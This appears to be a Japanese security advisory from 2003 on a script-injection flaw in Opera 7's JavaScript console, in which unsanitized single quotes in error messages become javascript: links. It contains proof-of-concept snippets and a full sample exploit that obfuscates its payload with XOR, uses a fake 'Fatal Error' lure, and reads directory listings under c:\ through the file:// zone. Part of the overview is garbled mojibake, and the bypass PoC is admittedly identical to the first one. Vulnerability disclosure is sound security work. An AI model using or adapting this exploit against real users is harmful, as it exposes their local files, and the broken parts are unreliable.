[Opera 7] Yet Another Story of "Phantom of the Opera" Apr 27 2003 06:12PM
nesumin (nesumin softhome net)
皆さんこんにちは。
私たちはここにOperaの脆弱性についての情報を公開します。

_________________________________________________

------------------------------------------------------------------------------
要約　　　　: [Opera 7] JavaScriptコンソールにおける任意のスクリプト挿入による脆弱性
　　　　　　 〜 Yet another story of "Phantom of the Opera" 〜
製品　　　　: Opera for Windows
バージョン　: 7.10 build 2840
　　　　　　 7.03 build 2670
　　　　　　 7.02 build 2668
　　　　　　 7.02 bork build 2656b
　　　　　　 7.01 build 2651
ベンダー　　: Opera Software ASA (http://www.opera.com/)
危険度　　　: 中程度。注意が必要。
　　　　　　 ローカルディスク上のデータの漏洩。
発見者　　　: :: Operash :: (nesumin)
報告日　　　: 2003-04-25
公開日　　　: 2003-04-28
オリジナル　: http://opera.rainyblue.org/adv/opera04-jsxss.php
------------------------------------------------------------------------------

0. 製品情報

Windows版 Opera はGUIベースのWEBブラウザーです。
Opera Software ASA (http://www.opera.com/)

1. 概要

Opera 7 の「JavaScriptコンソール」には、
表示されるリンクに任意のスクリプトを挿入できる脆弱性が存在します。

$B967b<T$O!"$3$N@H<e@-$rMxMQ$7$?0-0U$N$"$k%Z!<%8$rFI$_9~$^$;$k$3$H$G!"%
(%i!<(B
$B%a%C%;!<%8$r:Y9)$7$F!V(BJavaScript$B%3%s%=!<%k!W>e$K!"%m!<%+%k%>!<%
s(B(file://)$B$G(B
$B<B9T$5$l$kG$0U$N%9%/%j%W%H$r4^$s$@%j%s%/$r:n@.$9$k$3$H$,2DG=$G$9!#(B

$B$3$l$K$h$j!"%m!<%+%k%G%#%9%/>e$N%G!<%?$G$"$k%G%#%l%/%H%j9=B$$d%U%!%$%
k$NFbMFEy$N(B
$B>pJs$rFI$_<h$i$l!"$=$l$i$,30It$KO31L$9$kHo32$r<u$1$k4m81@-$,$"$j$^$9!
#(B

2. 影響を受けるシステム

Opera 7.10 build 2840
Opera 7.03 build 2670
Opera 7.02 build 2668
Opera 7.02 bork build 2656b
Opera 7.01 build 2651

3. 影響を受けないシステム

----

4. 脆弱性の確認に使用した環境

Opera Windows版 (英語版・日本語版)
Opera 7.10 build 2840
Opera 7.03 build 2670
Opera 7.02 build 2668
Opera 7.02 bork build 2656b
Opera 7.01 build 2651

プラットフォーム
Windows 98SE 日本語版
Windows 2000 Pro SP3 日本語版

5. ベンダーの対応

報告済み。(2003/04/25)

6. 回避方法

JavaScript機能をオフにする。

7. 詳細

この脆弱性は Opera 7 の console.html 内のスクリプトにおいて、
シングルクォートのサニタイジングが不十分であることが原因で起こります。
「http://');alert(location.href+'」のような「'」を含むエラーメッセージを発生させることで、
以下のように、リンクに任意のスクリプトを挿入される危険性があります。
（出力結果のとおり、エラーメッセージは javascript:opera.openInSourceViewer('…') という
href 内の文字列リテラルにそのまま展開されるため、「'」で文字列リテラルと文を終端させ、
その後ろに任意の文を続けることができます。）

// PoC 1: a single quote in the logged text terminates the string literal
// inside the javascript: href that console.html builds for the entry
// (see the "output" sample below), so everything after it is parsed as code.
var message = "http://');alert(location.href+'";
// Opera-specific API: writes the string to the JavaScript console.
opera.postError( message );
// Navigate to the console page itself; the injected link is rendered there,
// in the file:// zone, and runs with local-file privileges when clicked.
location.href = "file://localhost/console.html";

>> 出力結果：

<a href="javascript:opera.openInSourceViewer('http://');alert(location.href+'')">〜〜〜</a>

また、Opera 7.10 では「'」と「'」を削除する修正がされていますが、
このような修正だけでは不十分であり、当脆弱性を防ぐことはできません。
下記のように「'」の代わりに「'」などを利用されれば、同様に
任意のスクリプトの挿入が可能となります。
（注：本アーカイブでは迂回に用いる文字が通常の「'」と同じ表示になっており、
区別が失われています。正確な文字／表記は上記オリジナル URL を参照してください。）
なお、特定の文字を削除するブラックリスト方式では不十分であり、href 属性およびその中の
JavaScript 文字列リテラルという文脈に合わせて「'」「"」「<」「>」「&」「\」等を
すべてエスケープするか、そもそもエラーメッセージ本文から javascript: リンクを
生成しないことが根本的な対策となります。

// PoC 2: bypass of the Opera 7.10 quote-removal fix.
// NOTE(review): in this archived copy the payload is byte-identical to PoC 1
// above -- the alternate representation of the apostrophe that the author
// used to slip past 7.10's removal of "'" has been normalized to a plain "'"
// by the page encoding. Consult the original advisory (URL in the header)
// for the exact character or sequence.
var message = "http://');alert(location.href+'";
// Opera-specific API: writes the string to the JavaScript console.
opera.postError( message );
// Open the console page (file:// zone) so the injected link is shown there.
location.href = "file://localhost/console.html";

この脆弱性により利用者が当該リンクを開くと「file://localhost/console.html」で
スクリプトが実行され、ローカルディスク上のディレクトリ構造やファイルが読みとられる
危険性があります。

当脆弱性は、GreyMagic Softwareによって 2003-01-29 に公表された脆弱性

GreyMagic Software - Phantom of the Opera (GM#003-OP)
http://security.greymagic.com/adv/gm003-op/

に関連しています。
上記脆弱性は「"」（ダブルクォート）のサニタイジングに起因しますが、
当脆弱性は同一箇所の「'」（シングルクォート）のサニタイジングに起因します。

GreyMagic Software によってダブルクォートの問題を報告された時点で、
当然シングルクォートの問題も調査すべきでしたが、それを怠ったベンダーの
セキュリティーに対する認識の甘さが、この問題を現在まで残す事になった要因だと
考えます。

8. サンプルコード

◎ サンプル Exploit ソースコード

[1] 「Xploit」を「script」に置き換えて、HTMLファイルとしてWEBサーバーに置く
[2] Operaでそのページを開く
[3] JavaScriptコンソール上に作成されたリンクを開く

----------------------------------------------------------------
<Xploit>
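// Reads directory information under c:\ down to the specified depth.
// (Original Japanese comment: "c:\ 以下のディレクトリ情報を指定した深さまで読み取ります。")
//
// How this sample is assembled (see the advisory text above):
//   1. evil_script is the payload that ends up running in the file:// zone
//      once the victim clicks the injected console link.
//   2. The payload is XOR-0x80'd and URL-encoded, then wrapped in a message
//      that closes the single-quoted string inside the javascript: href
//      that console.html generates, re-decodes the payload and eval()s it.
//   3. The message ends with bogus "Fatal Error" text to entice a click.
// Fix applied in this copy: the "fake url" literal was wrapped across two
// lines by the archive (an unterminated string); it is one line here.

var depth = 1;
var startdir = "file://localhost/c:/";

// arbitrary script
// dt(dp) is re-armed every 30 ms via setTimeout while the hidden iframe `fr`
// loads a directory listing. Once the frame is 'complete' and has a <base>,
// it copies each <tr>/<td> of the listing into <div id="tree">, skips the
// "." and ".." rows, queues sub-directories (rows whose icon is folder.gif)
// on `ds` while dp > 0, then navigates the frame to the next queued
// directory and decrements dp -- so `depth` roughly bounds the descent.
// NOTE(review): the <tr>/<td>/<base>/folder.gif structure is Opera 7's
// file:// listing markup as observed by the author, not a stable interface;
// `fr` and `tree` are resolved through the browser's id-as-global behaviour.
var evil_script="";
evil_script += "function dt(dp){\n";
evil_script += "var i,j,tr,td,b;\n";
evil_script += "if('complete'==fr.document.readyState&&";
evil_script += "fr.document.getElementsByTagName('base').item(0)){\n";
evil_script += "tr=fr.document.getElementsByTagName('tr');\nb='<hr>\\n'";
evil_script += "+fr.document.getElementsByTagName('base').item(0).href;\n";
evil_script += "b+='<br>\\n'+'Count : '+tr.length+'<br>\\n';\n";
evil_script += "for(i=1;i<tr.length;++i){\n";
evil_script += "td = tr.item(i).getElementsByTagName('td');\n";
evil_script += "if (td.item(0).innerText.match(/^\\.\\.?$/))continue;\n";
evil_script += "if(dp>0 && td.item(0).getElementsByTagName('img')";
evil_script += ".item(0).src.match(/\\\\folder\\.gif$/))\n";
evil_script += "ds.push(td.item(0).getElementsByTagName('a').item(0).href);\n";
evil_script += "for (j=0;j<4;++j)b+=td.item(j).innerText+' ';";
evil_script += "b+='<br>\\n';}tree.innerHTML+=b;\n";
evil_script += "if (0>=ds.length)return;fr.location.href=ds.pop();--dp;}\n";
evil_script += "setTimeout('dt('+dp+');',30);}\nvar ds = new Array(),";
evil_script += "b = document.getElementsByTagName('body').item(0),";
evil_script += "f = document.createElement('iframe'),";
evil_script += "d = document.createElement('div');\n";
evil_script += "d.setAttribute('id','tree');b.appendChild(d);\n";
evil_script += "f.style.width=f.style.height=f.style.border=0;\n";
evil_script += "f.setAttribute('src','"+startdir+"');\n";
evil_script += "f.setAttribute('id','fr');\n";
evil_script += "b.appendChild(f);\n";
evil_script += "dt("+depth+");\n";

// xor and URLEncode
// Every character is XOR'd with 0x80 so it becomes >= 0x80 and is therefore
// percent-encoded by escape(); the result contains no quotes, angle
// brackets or ampersands -- presumably so the script survives whatever
// console.html strips or escapes (7.10 removes quotes) and reads like an
// ordinary URL-encoded query. `.` does not match "\n", so newlines pass
// through the XOR untouched and are simply encoded as %0A.
evil_script = escape(evil_script.replace(/./g,function(s){
return(String.fromCharCode(0x80^s.charCodeAt(0)))}));

var msg = "http://";

// fake url
// Looks like a normal URL with a query string; the trailing %XX bytes are
// filler so the encoded payload that follows does not stand out.
msg += "www.foohoge.bar/abcdefg?summary=fatal%20error&type=unknown&content=%90%12%38%79%80m";

// code
// "');" terminates the string literal and the openInSourceViewer() call in
// the generated href; m='...' stores the encoded payload; the decoder
// reverses escape()+XOR and eval()s it -- eval is the exploit's intended
// execution vector here, not an accident. The final "+'" re-opens a string
// literal, presumably so the remainder of the message (and the "')" that
// console.html appends) keeps the href syntactically valid.
msg += "');m='";
msg += evil_script;
msg += "';eval(unescape(m).replace(/./g,function(s){";
msg += "return(String.fromCharCode(0x80^s.charCodeAt(0)))})+'\n";

// fake message
// Social-engineering text shown to the victim in the console entry.
msg += "\n";
msg += "Fatal Error !!!!\n\n";
msg += " Please click above link.\n";

// Log the crafted entry (Opera-specific API), then open the console page
// itself so the victim sees -- and can click -- the injected file:// link.
opera.postError(msg);
//window.open("file://localhost/console.html","","");
location.href = "file://localhost/console.html";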

</Xploit>
----------------------------------------------------------------

検証目的以外、また自身の所有物及び、それに準ずる物以外での使用を禁じます。
このサンプルを利用した結果、如何なる損害が生じても、:: Operash :: 及び、
その関係者は一切の責を負いません。

9. この情報の取り扱いについて

・当情報は、その内容が保証されているものではありません。
　また、適宜修正される場合があります。
・当情報によって発生したいかなる損害も、:: Operash :: 及び、その関係者は
　一切の責を負いません。
・この文章の著作権は :: Operash :: 及び、その関係者が保有しています。

・当情報は、以下の全ての条件を満たす場合に於いてのみ、著作権者の許諾無しに
　転載、要約の掲載等を行ってよいものとします。

１）情報の一次発信元として、
　　:: Operash :: のトップページ (http://opera.rainyblue.org/) か、
　　または当情報のオリジナル (当投稿の上部にURLを記載)への
　　リンクを張るか、またはそのURLを明記する。
２）当情報の内容を歪曲して掲載しない。
３）掲載場所がインターネット上の媒体であること。

・上記以外の場合は、必ず当方へお問い合わせください。

10. 連絡先、その他

:: Operash :: http://opera.rainyblue.org/
imagine <imagine20xx (at) gmx (dot) net [email concealed]> (Operash Webmaster)
nesumin <nesumin (at) softhome (dot) net [email concealed]>

協力 (敬称略)

melorin
piso(sexy)

_________________________________________________

-------
nesumin <nesumin (at) softhome (dot) net [email concealed]>



 
